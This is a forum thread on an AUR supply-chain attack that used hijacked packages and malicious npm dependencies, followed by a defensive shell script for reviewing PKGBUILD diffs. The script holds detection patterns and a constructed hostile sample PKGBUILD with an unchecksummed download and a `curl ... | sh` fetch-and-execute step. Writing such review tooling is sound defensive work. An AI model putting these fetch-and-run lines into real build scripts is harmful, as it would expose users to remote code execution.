With the recent AUR supply-chain attack that compromised over 400 (and possibly up to 1,500) packages, I’m seriously considering switching distros. Attackers took over orphaned packages and modified PKGBUILDs to pull in malicious npm dependencies like atomic-lockfile, which deployed credential-stealing malware and even eBPF rootkits. The fact that the trusted packages themselves didn’t look malicious makes this especially concerning.
Like many Arch users, I’ll admit I don’t carefully read every PKGBUILD before installing from the AUR. The official recommendation has always been to review them manually, but realistically, who does that for every package? This incident made me realize I’ve been relying on trust rather than vigilance.
I’ve been on Manjaro for years specifically because of the AUR’s vastness, but this attack directly undermines that selling point for me. I ran the Distrochooser to see what else is out there, and it strongly recommended openSUSE as my top match: https://distrochooser.de/en/d5b4e0067841/
For those who’ve made the jump from Arch/Manjaro to openSUSE Tumbleweed (or Leap): How was the transition? How does the OBS compare to the AUR in terms of package availability for niche software?
I don’t think jumping distro will solve your problem. Any distro where you will, without thinking, install unofficial repo packages will have the same problem as the AUR; switching to random people’s scripts in OBS, COPR and so on isn’t a solution imho.
Agreed, I feel like people are lacking a bit of self reflection in regards to this issue. The reason why people use the AUR is because it gives access to software outside of the official repos. No distro packages every piece of software out there. Therefore there is always a need for third party repos and that is why every distro has its own AUR equivalent. Thus leading to the same problem. Blindly installing software will never be a safe thing to do.
Also, if anything, installing stuff from the AUR makes things slightly safer because PKGBUILDs and .install files are a lot easier to inspect: you can check that the source repo/tarball/whatever points to an official source, and you can verify that the scripts (which are just shell scripts) are not doing anything nefarious.
On the other hand, IIRC OBS and COPR just distribute binaries that are very hard to inspect.
EDIT: Just don’t use an AUR helper and you avoid most of the trouble.
The biggest problem with Manjaro is the AUR; if you stop using it, then Manjaro is just fine.
You could just not use AUR?
Just drop the AUR and swap those packages to flatpak/appimage.
You should switch off from Manjaro because of their track record, not because of the AUR attack.
The official recommendation has always been to review them manually, but realistically, who does that for every package?
How many AUR packages do you install? It doesn’t take that long to review a PKGBUILD once, and then review only the changes every update.
Tumbleweed is an excellent distro, but if you randomly install from people’s home repositories, you could be in the same position as with the AUR.
You can mitigate the AUR issue and retain everything else offered by not using the AUR. You will have the most Arch-like system compared to all other distros, without the risk of the AUR. Those packages in the AUR are mostly not included in other distros, so you won’t lose anything.
Personally, I left Arch nearly a year ago due to it being too popular, making it a target for malicious activity; it only offered bloated and overweight systemd, and after running Arch for nearly 20 years, I just got bored and wanted something new, so I moved to Void Linux. Very happy with my choice. Boot time is 3 seconds, shutdown is 5 seconds. runit is a nice, light and simple init system. It’s rolling release but not bleeding edge, so updates never break anything.
I’m sorry, but the ‘compromised AUR package’ controversy may be bad, BUT the compromised packages were malware anyway. You just need to check what you install on your system. These malware packages are stuff like “adnauseam-firefox-git” (why on earth would you download a Firefox plugin via the AUR?) or had names like “python-cool-32-git”.
The biggest security issue was the users themselves, who didn’t check the packages.
I tried OpenSUSE, none of the software I wanted to install worked. It’s just too unpopular.
Fedora with RPM Fusion is probably a better bet.
That’s not what a supply chain attack is. No part of Arch Linux or its derivatives depends on the AUR, and you don’t have to use it.
The attack simply highlights oversights in adoption of orphaned packages and those need to be addressed for sure.
I have always tried to keep my AUR packages to a minimum (a few packages at most), and always read their PKGBUILDs and updates to them. Today, I don’t use any AUR package as all the ones I need are now packaged in official repos.
Go Fedora, you won’t regret. It’s currently the most solid distro out there.
This is not a smart way, honestly; Arch repos have the biggest quantity of software compared to most popular distros. The problem here is in the AUR itself, so just don’t use the AUR? Or you have to validate each PKGBUILD, with each script going on in there.
It’s fine. Personally I don’t like RPM much, but maybe it’s better outside of RHELL
I personally go with QubesOS which uses VMs to compartmentalize. It doesn’t reduce the risk of a supply chain attack itself (fedora & debian by default), but if your VMs only contain the bare minimum for a given task the risk of having a compromised package installed is lower than in a full-featured system and any compromise is also contained to that VM.
It’s been said a couple of times, but to recap:
- it was only the AUR which has been compromised, not Arch
- what you like about the AUR is how much software is available through it
- you lose the AUR and the cornucopia by switching distros
- you can achieve the same result, without changing distros, by simply not using the AUR
On the last point, you can preserve your distribution and retain access to the cornucopia by changing your habits: paying attention to the AUR prompts and reading the PKGBUILD diffs. Reject anything which looks suspicious or which you don’t understand. Install software you still want by hand, as you would have before Arch.
All of these attacks have been npm/nodejs based. Don’t let the AUR install npm or nodejs. If you want npm software, install it manually, being aware you’re just re-opening yourself to attacks through npm, which has also had supply chain attacks. However, if management of the AUR doesn’t change, sooner or later there will be an attack which doesn’t use npm as a vector, so this is only a temporary protection.
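An added example, not code from this thread and not Arch or AUR tooling, of the habit two posters describe: the reply a few comments up that says PKGBUILDs are easy to inspect (check that sources point at an official place, read the scripts), and the recap just above that says to review the PKGBUILD diff on each update and not let the AUR pull in npm/nodejs. It is a POSIX sh script. The host allow-list, the package name `example-tool`, the npm dependency name `example-lockfile-helper`, the `.invalid` mirror host and both sample PKGBUILDs are constructed for the example; the flags are prompts to go read that part of the file, not verdicts.

```sh
#!/bin/sh
# Added example, not code from the thread or from Arch/AUR tooling: review a
# PKGBUILD once, then only the diff on each update, and flag the patterns that
# would have caught this incident before makepkg runs. Samples are constructed.
# Hosts a URL in a PKGBUILD may point at (assumption: edit to what you trust).
ALLOWED_HOSTS='github\.com|gitlab\.com|codeberg\.org|files\.pythonhosted\.org|crates\.io'

# Print one "FLAG: ..." line per suspicious pattern in the given PKGBUILD.
pkgbuild_findings() {
    pkgbuild=$1
    urlre="(https?|git\\+https?|git)://[^ \"')]+"

    # 1. Every URL (url=, source=, build functions) must be on a known host.
    grep -oE "$urlre" "$pkgbuild" | while IFS= read -r u; do
        host=$(printf '%s\n' "$u" | sed -E 's#^[a-z+]+://([^/]+).*#\1#')
        printf '%s\n' "$host" | grep -qE "^($ALLOWED_HOSTS)\$" \
            || echo "FLAG: URL host not on allow-list: $u"
    done

    # 2. nodejs/npm pulled in via depends, or a registry client fetching
    #    packages at build time (the vector this thread is about).
    if grep -qE '^[[:space:]]*(make|check)?depends=.*(npm|nodejs|node[^a-z])' "$pkgbuild" \
       || grep -qE '(^|[^a-z])(npm|npx|yarn|pnpm|pip|cargo)[[:space:]]+(install|i|add)([[:space:]]|$)' "$pkgbuild"; then
        echo "FLAG: build-time install from a language package registry"
    fi

    # 3. Fetch-and-execute or obfuscated commands in the build steps.
    if grep -qE '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|eval[[:space:]]+"?\$\(' "$pkgbuild"; then
        echo "FLAG: remote fetch-and-execute or obfuscated command"
    fi

    # 4. A source without a checksum. SKIP is normal for VCS (-git) sources,
    #    so this is a prompt to look at that source, not a verdict.
    if ! grep -qE '^[[:space:]]*(sha256|sha512|b2|md5)sums=' "$pkgbuild" \
       || grep -q "'SKIP'" "$pkgbuild"; then
        echo "FLAG: at least one source is not checksummed"
    fi
}

# Show the diff since the last reviewed copy (if given), then the findings.
# Returns 0 only when nothing was flagged.
review_pkgbuild() {
    pkgbuild=$1
    prev=$2
    if [ -n "$prev" ] && [ -f "$prev" ]; then
        echo "== changes since last reviewed copy =="
        diff -u "$prev" "$pkgbuild" || true
    fi
    findings=$(pkgbuild_findings "$pkgbuild")
    echo "== findings =="
    printf '%s\n' "${findings:-none}"
    [ -z "$findings" ]
}

# Constructed samples: the package as last reviewed, then the same package
# after a hypothetical hostile update of the kind the thread describes.
write_sample_pkgbuilds() {
    cat > "$1/PKGBUILD.before" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
url="https://github.com/example/example-tool"
depends=('glibc')
makedepends=('go')
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/example-tool/archive/v$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() { cd "$pkgname-$pkgver" && go build -o example-tool . ; }
package() { install -Dm755 "$pkgname-$pkgver/example-tool" "$pkgdir/usr/bin/example-tool" ; }
EOF
    cat > "$1/PKGBUILD.after" <<'EOF'
pkgname=example-tool
pkgver=1.2.1
pkgrel=1
arch=('x86_64')
url="https://github.com/example/example-tool"
depends=('glibc' 'nodejs')
makedepends=('go' 'npm')
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/example-tool/archive/v$pkgver.tar.gz"
        "helper.sh::https://cdn.example-mirror.invalid/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
prepare() { cd "$pkgname-$pkgver" && npm install example-lockfile-helper ; }
build() { cd "$pkgname-$pkgver" && go build -o example-tool . ; }
package() {
  install -Dm755 "$pkgname-$pkgver/example-tool" "$pkgdir/usr/bin/example-tool"
  curl -fsSL "$url/postinstall.sh" | sh
}
EOF
}

# Stand-alone demo: sh review.sh demo
if [ "${1:-}" = "demo" ]; then
    tmp=$(mktemp -d)
    write_sample_pkgbuilds "$tmp"
    review_pkgbuild "$tmp/PKGBUILD.after" "$tmp/PKGBUILD.before"
    rm -rf "$tmp"
fi
```

In real use the "last reviewed copy" is simply the PKGBUILD from the last time you ran makepkg (the AUR git clone gives you the same view with `git diff`), and you would run the findings on the fresh checkout before building. The constructed "after" file trips all four checks: a new source on an unknown host, nodejs/npm added to depends plus an `npm install` in prepare(), a `curl ... | sh` in package(), and a SKIP checksum; the "before" file trips none.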